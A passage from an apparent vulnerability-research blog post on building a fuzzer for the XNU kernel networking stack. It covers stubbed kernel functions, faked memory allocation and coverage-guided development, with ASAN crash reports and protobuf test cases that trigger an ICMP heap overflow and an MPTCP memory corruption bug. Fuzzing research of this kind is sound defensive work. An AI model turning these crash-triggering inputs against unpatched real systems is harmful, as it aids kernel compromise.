    tcphdr.th_flags &= ~(TH_RST | TH_ACK);

    tcphdr.th_flags |= TH_SYN;

  } else if (hdr.is_pure_ack()) {

    tcphdr.th_flags &= ~(TH_RST | TH_SYN);

    tcphdr.th_flags |= TH_ACK;

  }

  std::string dat((char *)&tcphdr, (char *)&tcphdr + sizeof(tcphdr));

  return dat;

}


As you can see, I make liberal use of a custom grammar to enable better quality fuzzing. These efforts are worth it, as randomizing high level structure is more efficient. It will also be easier for us to interpret crashing test cases later as they will have the same high level representation.

High-Level Emulation

Now that we have the code building and an initial fuzz target running, we begin the first pass at implementing all of the stubbed code that is reachable by our fuzz target. Because we have a fuzz target that builds and runs, we now get instant feedback about which functions our target hits. Some core functionality has to be supported before we can find any bugs, so the first attempt to run the fuzzer deserves its own development phase. For example, until dynamic memory allocation is supported, almost no kernel code we try to cover will work considering how heavily such code is used.

We’ll be implementing our stubbed functions with fake variants that attempt to have the same semantics. For example, when testing code that uses an external database library, you could replace the database with a simple in-memory implementation. If you don’t care about finding database bugs, this often makes fuzzing simpler and more robust. For some kernel subsystems unrelated to networking we can use entirely different or null implementations. This process is reminiscent of high-level emulation, an idea used in game console emulation. Rather than aiming to emulate hardware, you can try to preserve the semantics but use a custom implementation of the API. Because we only care about testing networking, this is how we approach faking subsystems in this project.

I always start by looking at the original function implementation. If it’s possible, I just link in that code as well. But some functionality isn’t compatible with our fuzzer and must be faked. For example, zalloc should call the userland malloc since virtual memory is already managed by our host kernel and we have allocator facilities available. Similarly, copyin and copyout need to be faked as they no longer serve to copy data between user and kernel pages. Sometimes we also just “nop” out functionality that we don’t care about. We’ll cover these decisions in more detail later in the “High-Level Emulation” phase. Note that by implementing these stubs lazily whenever our fuzz target hits them, we immediately reduce the work in handling all the unrelated functions by an order of magnitude. It’s easier to stay motivated when you only implement fakes for functions that are used by the target code. This approach successfully saved me a lot of time and I’ve used it on subsequent projects as well. At the time of writing, I have 398 stubbed functions, about 250 functions that are trivially faked (return 0 or void functions that do nothing), and about 25 functions that I faked myself (almost all related to porting the memory allocation systems to userland).

Booting Up

As soon as we start running the fuzzer, we’ll run into a snag: many resources require a one-time initialization that happens on boot. The BSD half of the kernel is mostly initialized by calling the bsd_init function. That function, in turn, calls several subsystem-specific initialization functions. Keeping with the theme of supporting a minimally necessary subset of the kernel, rather than call bsd_init, we create a new function that only initializes parts of the kernel as needed.

Here’s an example crash that occurs without the one time kernel bootup initialization:

    #7 0x7effbc464ad0 in zalloc /source/build3/../fuzz/zalloc.c:35:3

    #8 0x7effbb62eab4 in pipepair_alloc /source/build3/../bsd/kern/sys_pipe.c:634:24

    #9 0x7effbb62ded5 in pipe /source/build3/../bsd/kern/sys_pipe.c:425:10

    #10 0x7effbc4588ab in pipe_wrapper /source/build3/../fuzz/syscall_wrappers.c:216:10

    #11 0x4ee1a4 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:979:19

Our zalloc implementation (covered in the next section) failed because the pipe zone wasn’t yet initialized:

static int

pipepair_alloc(struct pipe **rp_out, struct pipe **wp_out)

{

        struct pipepair *pp = zalloc(pipe_zone);

Scrolling up in sys_pipe.c, we see where that zone is initialized:

void

pipeinit(void)

{

        nbigpipe = 0;

        vm_size_t zone_size;

        zone_size = 8192 * sizeof(struct pipepair);

        pipe_zone = zinit(sizeof(struct pipepair), zone_size, 4096, "pipe zone");

Sure enough, this function is called by bsd_init. By adding that to our initial setup function the zone works as expected. After some development cycles spent supporting all the needed bsd_init function calls, we have the following:

__attribute__((visibility("default"))) bool initialize_network() {

  mcache_init();

  mbinit();

  eventhandler_init();

  pipeinit();

  dlil_init();

  socketinit();

  domaininit();

  loopattach();

  ether_family_init();

  tcp_cc_init();

  net_init_run();

  int res = necp_init();

  assert(!res);

  return true;

}


The original
bsd_init is 683 lines long, but our initialize_network clone is the preceding short snippet. I want to remark how cool I found it that you could “boot” a kernel like this and have everything work so long as you implemented all the relevant stubs. It just goes to show a surprising fact: a significant amount of kernel code is portable, and simple steps can be taken to make it testable. These codebases can be modernized without being fully rewritten. As this “boot” relies on dynamic allocation, let’s look at how I implemented that next.

Dynamic Memory Allocation

Providing a virtual memory abstraction is a fundamental goal of most kernels, but the good news is this is out of scope for this project (this is left as an exercise for the reader). Because networking already assumes working virtual memory, the network stack functions almost entirely on top of high-level allocator APIs. This makes the subsystem amenable to “high-level emulation”. We can create a thin shim layer that intercepts XNU specific allocator calls and translates them to the relevant host APIs.

In practice, we have to handle three types of allocations for this project: “classic” allocations (malloc/calloc/free), zone allocations (zalloc), and mbuf (memory buffers). The first two types are more fundamental allocation types used across XNU, while mbufs are a common data structure used in low-level networking code.

The zone allocator is reasonably complicated, but we use a simplified model for our purposes: we just track the size assigned to a zone when it is created and make sure we malloc that size when zalloc is later called using the initialized zone. This could undoubtedly be modeled better, but this initial model worked quite well for the types of bugs I was looking for. In practice, this simplification affects exploitability, but we aren’t worried about that for a fuzzing project as we can assess that manually once we discover an issue. As you can see below, I created a custom zone type that simply stored the configured size, knowing that my zinit would return an opaque pointer that would be passed to my zalloc implementation, which could then use calloc to service the request. zfree simply freed the requested bytes and ignored the zone, as allocation sizes are tracked by the host malloc already.

struct zone {

  uintptr_t size;

};

struct zone* zinit(uintptr_t size, uintptr_t max, uintptr_t alloc,

                   const char* name) {

  struct zone* zone = (struct zone*)calloc(1, sizeof(struct zone));

  zone->size = size;

  return zone;

}

void* zalloc(struct zone* zone) {

  assert(zone != NULL);

  return calloc(1, zone->size);

}

void zfree(void* zone, void* dat) {

  (void)zone;

  free(dat);

}

Kalloc, kfree, and related functions were passed through to malloc and free as well. You can see fuzz/zalloc.c for their implementations. Mbufs (memory buffers) are more work to implement because they contain considerable metadata that is exposed to the “client” networking code.

struct m_hdr {

        struct mbuf     *mh_next;       /* next buffer in chain */

        struct mbuf     *mh_nextpkt;    /* next chain in queue/record */

        caddr_t         mh_data;        /* location of data */

        int32_t         mh_len;         /* amount of data in this mbuf */

        u_int16_t       mh_type;        /* type of data in this mbuf */

        u_int16_t       mh_flags;       /* flags; see below */

};

/*

 * The mbuf object

 */

struct mbuf {

        struct m_hdr m_hdr;

        union {

                struct {

                        struct pkthdr MH_pkthdr;        /* M_PKTHDR set */

                        union {

                                struct m_ext MH_ext;    /* M_EXT set */

                                char    MH_databuf[_MHLEN];

                        } MH_dat;

                } MH;

                char    M_databuf[_MLEN];               /* !M_PKTHDR, !M_EXT */

        } M_dat;

};


I didn’t include the
pkthdr nor m_ext structure definitions, but they are nontrivial (you can see for yourself in bsd/sys/mbuf.h). A lot of trial and error was needed to create a simplified mbuf format that would work. In practice, I use an inline buffer when possible and, when necessary, locate the data in one large external buffer and set the M_EXT flag. As these allocations must be aligned, I use posix_memalign to create them, rather than malloc. Fortunately ASAN can help manage these allocations, so we can detect some bugs with this modification.

Two bugs I reported via the Project Zero tracker highlight the benefit of the heap-based mbuf implementation. In the first report, I detected an mbuf double free using ASAN. While the m_free implementation tries to detect double frees by checking the state of the allocation, ASAN goes even further by quarantining recently freed allocations to detect the bug. In this case, it looks like the fuzzer would have found the bug either way, but it was impressive. The second issue linked is much subtler and requires some instrumentation to detect the bug, as it is a use after free read of an mbuf:

==22568==ERROR: AddressSanitizer: heap-use-after-free on address 0x61500026afe5 at pc 0x7ff60f95cace bp 0x7ffd4d5617b0 sp 0x7ffd4d5617a8

READ of size 1 at 0x61500026afe5 thread T0

    #0 0x7ff60f95cacd in tcp_input bsd/netinet/tcp_input.c:5029:25

    #1 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2

    #2 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10

0x61500026afe5 is located 229 bytes inside of 256-byte region [0x61500026af00,0x61500026b000)

freed by thread T0 here:

    #0 0x4a158d in free /b/swarming/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3

    #1 0x7ff60fb7444d in m_free fuzz/zalloc.c:220:3

    #2 0x7ff60f4e3527 in m_freem bsd/kern/uipc_mbuf.c:4842:7

    #3 0x7ff60f5334c9 in sbappendstream_rcvdemux bsd/kern/uipc_socket2.c:1472:3

    #4 0x7ff60f95821d in tcp_input bsd/netinet/tcp_input.c:5019:8

    #5 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2

    #6 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10


Apple managed to catch this issue before I reported it, fixing it in iOS 13. I believe Apple has added some internal hardening or testing for mbufs that caught this bug. It could be anything from a hardened mbuf allocator like
GWP-ASAN, to an internal ARM MTE test, to simple auditing, but it was really cool to see this issue detected in this way, and also that Apple was proactive enough to find this themselves.

Accessing User Memory

When talking about this project with a fellow attendee at a fuzzing conference, their biggest question was how I handled user memory access. Kernels are never supposed to trust pointers provided by user-space, so whenever the kernel wants to access memory-mapped in userspace, it goes through intermediate functions copyin and copyout. By replacing these functions with our fake implementations, we can supply fuzzer-provided input to the tested code. The real kernel would have done the relevant copies from user to kernel pages. Because these copies are driven by the target code and not our testcase, I added a buffer in the protobuf specification to be used to service these requests.

Here’s a backtrace from our stub before we implement `copyin`. As you can see, when calling the `recvfrom` syscall, our fuzzer passed in a pointer as an argument.

    #6 0x7fe1176952f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7fe11769a110 in copyin /source/build3/../fuzz/fake_impls.c:408:3

    #8 0x7fe116951a18 in __copyin_chk /source/build3/../bsd/libkern/copyio.h:47:9

    #9 0x7fe116951a18 in recvfrom_nocancel /source/build3/../bsd/kern/uipc_syscalls.c:2056:11

    #10 0x7fe117691a86 in recvfrom_nocancel_wrapper /source/build3/../fuzz/syscall_wrappers.c:244:10

    #11 0x4e933a in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:936:9

    #12 0x4e43b8 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

I’ve extended the copyin specification with my fuzzer-specific semantics: when the pointer (void*)1 is passed as an address, we interpret this as a request to fetch arbitrary bytes. Otherwise, we copy directly from that virtual memory address. This way, we can begin by passing (void*)1 everywhere in the fuzz target to get as much cheap coverage as possible. Later, as we want to construct well-formed data to pass into syscalls, we build the data in the protobuf test case handler and pass a real pointer to it, allowing it to be copied. This flexibility saves us time while permitting the construction of highly-structured data inputs as we see fit.

int __attribute__((warn_unused_result))

copyin(void* user_addr, void* kernel_addr, size_t nbytes) {

  // Address 1 means use fuzzed bytes, otherwise use real bytes.

  // NOTE: this does not support nested useraddr.

  if (user_addr != (void*)1) {

    memcpy(kernel_addr, user_addr, nbytes);

    return 0;

  }

  if (get_fuzzed_bool()) {

    return -1;

  }

  get_fuzzed_bytes(kernel_addr, nbytes);

  return 0;

}

Copyout is designed similarly. We often don’t care about the data copied out; we just care about the safety of the accesses. For that reason, we make sure to memcpy from the source buffer in all cases, using a temporary buffer when a copy to (void*)1 occurs. If the kernel copies out of bounds or from freed memory, for example, ASAN will catch it and inform us about a memory disclosure vulnerability.

Synchronization and Threads

Among the many changes made to XNU’s behavior to support this project, perhaps the most extensive and invasive are the changes I made to the synchronization and threading model. Before beginning this project, I had spent over a year working on Chrome browser process research, where high level “sequences” are preferred to using physical threads. Despite a paucity of data races, Chrome still had sequence-related bugs that were triggered by randomly servicing some of the pending work in between performing synchronous IPC calls. In an exploit for a bug found by the AppCache fuzzer, sleep calls were needed to get the asynchronous work to be completed before queueing up some more work synchronously. So I already knew that asynchronous continuation-passing style concurrency could have exploitable bugs that are easy to discover with this fuzzing approach.

I suspected I could find similar bugs if I used a similar model for sockfuzzer. Because XNU uses multiple kernel threads in its networking stack, I would have to port it to a cooperative style. To do this, I provided no-op implementations for all of the thread management functions and sync primitives, and instead randomly called the work functions that would have been called by the real threads. This involved modifying code: most worker threads run in a loop, processing new work as it comes in. I modified these infinitely looping helper functions to do one iteration of work and exposed them to the fuzzer frontend. Then I called them randomly as part of the protobuf message. The main benefit of doing the project this way was improved performance and determinism. Places where the kernel could block the fuzzer were modified to return early. Overall, it was a lot simpler and easier to manage a single-threaded process. But this decision did not end up yielding as many bugs as I had hoped. For example, I suspected that interleaving garbage collection of various network-related structures with syscalls would be more effective. It did achieve the goal of removing threading-related headaches from deploying the fuzzer, but this is a serious weakness that I would like to address in future fuzzer revisions.

Randomness

Randomness is another service provided by kernels to userland (e.g. /dev/random) and in-kernel services requiring it. This is easy to emulate: we can just return as many bytes as were requested from the current test case’s data_provider field.

Authentication

XNU features some mechanisms (KAuth, mac checks, user checks) to determine whether a given syscall is permissible. Because of the importance and relative rarity of bugs in XNU, and my willingness to triage false positives, I decided to allow all actions by default. For example, the TCP multipath code requires a special entitlement, but disabling this functionality precludes us from finding Ian’s multipath vulnerability. Rather than fuzz only code accessible inside the app sandbox, I figured I would just triage whatever comes up and report it with the appropriate severity in mind.

For example, when we create a socket, the kernel checks whether the running process is allowed to make a socket of the given domain, type, and protocol provided their KAuth credentials:

static int

socket_common(struct proc *p,

    int domain,

    int type,

    int protocol,

    pid_t epid,

    int32_t *retval,

    int delegate)

{

        struct socket *so;

        struct fileproc *fp;

        int fd, error;

        AUDIT_ARG(socket, domain, type, protocol);

#if CONFIG_MACF_SOCKET_SUBSET

        if ((error = mac_socket_check_create(kauth_cred_get(), domain,

            type, protocol)) != 0) {

                return error;

        }

#endif /* MAC_SOCKET_SUBSET */

When we reach this function in our fuzzer, we trigger an assert crash as this functionality was  stubbed.

    #6 0x7f58f49b53f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7f58f49ba070 in kauth_cred_get /source/build3/../fuzz/fake_impls.c:272:3

    #8 0x7f58f3c70889 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:39

    #9 0x7f58f3c7043a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9

    #10 0x7f58f49b45e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10

    #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19

Now, we need to implement kauth_cred_get. In this case, we return a (void*)1 pointer so that NULL checks on the value will pass (and if it turns out we need to model this correctly, we’ll crash again when the pointer is used).

void* kauth_cred_get() {

  return (void*)1;

}

Now we crash actually checking the KAuth permissions.

    #6 0x7fbe9219a3f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7fbe9219f100 in mac_socket_check_create /source/build3/../fuzz/fake_impls.c:312:33

    #8 0x7fbe914558a3 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:15

    #9 0x7fbe9145543a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9

    #10 0x7fbe921995e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10

    #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19

    #12 0x4e76c2 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

Now we simply return 0 and move on.

int mac_socket_check_create() { return 0; }

As you can see, we don’t always need to do a lot of work to fake functionality. We can opt for a much simpler model that still gets us the results we want.

Coverage Guided Development

We’ve paid a sizable initial cost to implement this fuzz target, but we’re now entering the longest and most fun stage of the project: iterating and maintaining the fuzzer. We begin by running the fuzzer continuously (in my case, I ensured it could run on ClusterFuzz). A day of work then consists of fetching the latest corpus, running a clang-coverage visualization pass over it, and viewing the report. While initially most of the work involved fixing assertion failures to get the fuzzer working, we now look for silent implementation deficiencies only visible in the coverage reports. A snippet from the report looks like the following:

Several lines of code have a column indicating that they have been covered tens of thousands of times. Below them, you can see a switch statement for handling the parsing of IP options. Only the default case is covered approximately fifty thousand times, while the routing record options are covered 0 times.

This excerpt from IP option handling shows that we don’t support the various packets well with the current version of the fuzzer and grammar. Having this visualization is enormously helpful and necessary to succeed, as it is a source of truth about your fuzz target. By directing development work around these reports, it’s relatively easy to plan actionable and high-value tasks around the fuzzer.

I like to think about improving a fuzz target by either improving “soundness” or “completeness.” Logicians probably wouldn’t be happy with how I’m loosely using these terms, but they are a good metaphor for the task. To start with, we can improve the completeness of a given fuzz target by helping it reach code that we know to be reachable based on manual review. In the above example, I would suspect very strongly that the uncovered option handling code is reachable. But despite a long fuzzing campaign, these lines are uncovered, and therefore our fuzz target is incomplete, somehow unable to generate inputs reaching these lines. There are two ways to get this needed coverage: in a top-down or bottom-up fashion. Each has its tradeoffs. The top-down way to cover this code is to improve the existing grammar or C++ code to make it possible or more likely. The bottom-up way is to modify the code in question. For example, we could replace switch (opt) with something like switch (global_fuzzed_data->ConsumeRandomEnum(valid_enums). This bottom-up approach introduces unsoundness, as maybe these enums could never have been selected at this point. But this approach has often led to interesting-looking crashes that encouraged me to revert the change and proceed with the more expensive top-down implementation. When it’s one researcher working against potentially hundreds of thousands of lines, you need tricks to prioritize your work. By placing many cheap bets, you can revert later for free and focus on the most fruitful areas.

Improving soundness is the other side of the coin here. I’ve just mentioned reverting unsound changes and moving those changes out of the target code and into the grammar. But our fake objects are also simple models for how their real implementations behave. If those models are too simple or directly inaccurate, we may either miss bugs or introduce them. I’m comfortable missing some bugs as I think these simple fakes enable better coverage, and it’s a net win. But sometimes, I’ll observe a crash or failure to cover some code because of a faulty model. So improvements can often come in the form of making these fakes better.

All in all, there is plenty of work that can be done at any given point. Fuzzing isn’t an all or nothing one-shot endeavor for large targets like this. This is a continuous process, and as time goes on, easy gains become harder to achieve as most bugs detectable with this approach are found, and eventually, there comes a natural stopping point. But despite working on this project for several months, it’s remarkably far from the finish line despite producing several useful bug reports. The cool thing about fuzzing in this way is that it is a bit like excavating a fossil. Each target is different; we make small changes to the fuzzer, tapping away at the target with a chisel each day and letting our coverage metrics, not our biases, reveal the path forward.

Packet Delivery

I’d like to cover one example to demonstrate the value of the “bottom-up” unsound modification, as in some cases, the unsound modification is dramatically cheaper than the grammar-based one. Disabling hash checks is a well-known fuzzer-only modification when fuzzer-authors know that checksums could be trivially generated by hand. But it can also be applied in other places, such as packet delivery.

When an mbuf containing a TCP packet arrives, it is handled by tcp_input. In order for almost anything meaningful to occur with this packet, it must be matched by IP address and port to an existing process control block (PCB) for that connection, as seen below.

void

tcp_input(struct mbuf *m, int off0)

{

// ...

        if (isipv6) {

            inp = in6_pcblookup_hash(&tcbinfo, &ip6->ip6_src, th->th_sport,

                &ip6->ip6_dst, th->th_dport, 1,

                m->m_pkthdr.rcvif);

        } else

#endif /* INET6 */

        inp = in_pcblookup_hash(&tcbinfo, ip->ip_src, th->th_sport,

            ip->ip_dst, th->th_dport, 1, m->m_pkthdr.rcvif);

Here’s the IPv4 lookup code. Note that faddr, fport_arg, laddr, and lport_arg are all taken directly from the packet and are checked against the list of PCBs, one at a time. This means that we must guess two 4-byte integers and two 2-byte shorts to match the packet to the relevant PCB. Even coverage-guided fuzzing is going to have a hard time guessing its way through these comparisons. While eventually a match will be found, we can radically improve the odds of covering meaningful code by just flipping a coin instead of doing the comparisons. This change is extremely easy to make, as we can fetch a random boolean from the fuzzer at runtime. Looking up existing PCBs and fixing up the IP/TCP headers before sending the packets is a sounder solution, but in my testing this change didn’t introduce any regressions. Now when a vulnerability is discovered, it’s just a matter of fixing up headers to match packets to the appropriate PCB. That’s light work for a vulnerability researcher looking for a remote memory corruption bug.

/*

 * Lookup PCB in hash list.

 */

struct inpcb *

in_pcblookup_hash(struct inpcbinfo *pcbinfo, struct in_addr faddr,

    u_int fport_arg, struct in_addr laddr, u_int lport_arg, int wildcard,

    struct ifnet *ifp)

{

// ...

    head = &pcbinfo->ipi_hashbase[INP_PCBHASH(faddr.s_addr, lport, fport,

        pcbinfo->ipi_hashmask)];

    LIST_FOREACH(inp, head, inp_hash) {

-               if (inp->inp_faddr.s_addr == faddr.s_addr &&

-                   inp->inp_laddr.s_addr == laddr.s_addr &&

-                   inp->inp_fport == fport &&

-                   inp->inp_lport == lport) {

+               if (!get_fuzzed_bool()) {

                        if (in_pcb_checkstate(inp, WNT_ACQUIRE, 0) !=

                            WNT_STOPUSING) {

                                lck_rw_done(pcbinfo->ipi_lock);

                                return inp;


Astute readers may have noticed that the PCBs are fetched from a hash table, so it’s not enough just to replace the check. The 4 values used in the linear search are used to calculate a PCB hash, so we have to make sure all PCBs share a single bucket, as seen in the diff below. The real kernel shouldn’t do this as lookups become O(n), but we only create a few sockets, so it’s acceptable.

diff --git a/bsd/netinet/in_pcb.h b/bsd/netinet/in_pcb.h

index a5ec42ab..37f6ee50 100644

--- a/bsd/netinet/in_pcb.h

+++ b/bsd/netinet/in_pcb.h

@@ -611,10 +611,9 @@ struct inpcbinfo {

        u_int32_t               ipi_flags;

 };

-#define INP_PCBHASH(faddr, lport, fport, mask) \

-       (((faddr) ^ ((faddr) >> 16) ^ ntohs((lport) ^ (fport))) & (mask))

-#define INP_PCBPORTHASH(lport, mask) \

-       (ntohs((lport)) & (mask))

+// nedwill: let all pcbs share the same hash

+#define        INP_PCBHASH(faddr, lport, fport, mask) (0)

+#define        INP_PCBPORTHASH(lport, mask) (0)

 #define INP_IS_FLOW_CONTROLLED(_inp_) \

        ((_inp_)->inp_flags & INP_FLOW_CONTROLLED)

Checking Our Work: Reproducing the Sample Bugs

With most of the necessary supporting code implemented, we can fuzz for a while without hitting any assertions due to unimplemented stubbed functions. At this stage, I reverted the fixes for the two inspiration bugs I mentioned at the beginning of this article. Here’s what we see shortly after we run the fuzzer with those fixes reverted:

==1633983==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00029f474 at pc 0x00000049fcb7 bp 0x7ffcddc88590 sp 0x7ffcddc87d58

WRITE of size 20 at 0x61d00029f474 thread T0

    #0 0x49fcb6 in __asan_memmove /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:30:3

    #1 0x7ff64bd83bd9 in __asan_bcopy fuzz/san.c:37:3

    #2 0x7ff64ba9e62f in icmp_error bsd/netinet/ip_icmp.c:362:2

    #3 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2

    #4 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34

    #5 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3

    #6 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7

    #7 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

0x61d00029f474 is located 12 bytes to the left of 2048-byte region [0x61d00029f480,0x61d00029fc80)

allocated by thread T0 here:

    #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3

    #1 0x7ff64bd82b20 in mbuf_create fuzz/zalloc.c:157:45

    #2 0x7ff64bd8319e in mcache_alloc fuzz/zalloc.c:187:12

    #3 0x7ff64b69ae84 in m_getcl bsd/kern/uipc_mbuf.c:3962:6

    #4 0x7ff64ba9e15c in icmp_error bsd/netinet/ip_icmp.c:296:7

    #5 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2

    #6 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34

    #7 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3

    #8 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7

    #9 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

When we inspect the test case, we see that a single raw IPv4 packet was generated to trigger this bug. This is to be expected, as the bug doesn’t require an existing connection, and looking at the stack, we can see that the test case triggered the bug in the IPv4-specific ip_input path.

commands {

  ip_input {

    raw_ip4: "M\001\000I\001\000\000\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII"

  }

}

data_provider: ""


If we fix that issue and fuzz a bit longer, we soon see another crash, this time in the MPTCP stack. This is Ian’s MPTCP vulnerability. The ASAN report looks strange though. Why is it crashing during garbage collection in
mptcp_session_destroy? The original vulnerability was an OOB write, but ASAN couldn’t catch it because it corrupted memory within a struct. This is a well-known shortcoming of ASAN and similar mitigations, importantly the upcoming MTE. This means we don’t catch the bug until later, when a randomly corrupted pointer is accessed.

==1640571==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x6190000079dc in thread T0

    #0 0x4a0094 in free /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3

    #1 0x7fbdfc7a16b0 in _FREE fuzz/zalloc.c:293:36

    #2 0x7fbdfc52b624 in mptcp_session_destroy bsd/netinet/mptcp_subr.c:742:3

    #3 0x7fbdfc50c419 in mptcp_gc bsd/netinet/mptcp_subr.c:4615:3

    #4 0x7fbdfc4ee052 in mp_timeout bsd/netinet/mp_pcb.c:118:16

    #5 0x7fbdfc79b232 in clear_all fuzz/backend.c:83:3

    #6 0x4dfd5c in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:1010:3

0x6190000079dc is located 348 bytes inside of 920-byte region [0x619000007880,0x619000007c18)

allocated by thread T0 here:

    #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3

    #1 0x7fbdfc7a03d4 in zalloc fuzz/zalloc.c:37:10

    #2 0x7fbdfc4ee710 in mp_pcballoc bsd/netinet/mp_pcb.c:222:8

    #3 0x7fbdfc53cf8a in mptcp_attach bsd/netinet/mptcp_usrreq.c:211:15

    #4 0x7fbdfc53699e in mptcp_usr_attach bsd/netinet/mptcp_usrreq.c:128:10

    #5 0x7fbdfc0e1647 in socreate_internal bsd/kern/uipc_socket.c:784:10

    #6 0x7fbdfc0e23a4 in socreate bsd/kern/uipc_socket.c:871:9

    #7 0x7fbdfc118695 in socket_common bsd/kern/uipc_syscalls.c:266:11

    #8 0x7fbdfc1182d1 in socket bsd/kern/uipc_syscalls.c:214:9

    #9 0x7fbdfc79a26e in socket_wrapper fuzz/syscall_wrappers.c:371:10

    #10 0x4dd275 in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:655:19

Here’s the protobuf input for the crashing testcase:

commands {

  socket {

    domain: AF_MULTIPATH

    so_type: SOCK_STREAM

    protocol: IPPROTO_IP

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_srcaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"

        }

      }

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_srcaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_AUTHENTICATED

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  close {

    fd: FD_8

  }

}

commands {

  ioctl_real {

    siocsifflags {

      ifr_name: LO0

      flags: IFF_LINK1

    }

  }

}

commands {

  close {

    fd: FD_8

  }

}

data_provider: "\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025"

Hmm, that’s quite large and hard to follow. Is the bug really that complicated? We can use libFuzzer’s crash minimization feature to find out. Protobuf-based test cases simplify nicely because even large test cases are already structured, so we can randomly edit and remove nodes from the message. After about a minute of automated minimization, we end up with the test shown below.

commands {

  socket {

    domain: AF_MULTIPATH

    so_type: SOCK_STREAM

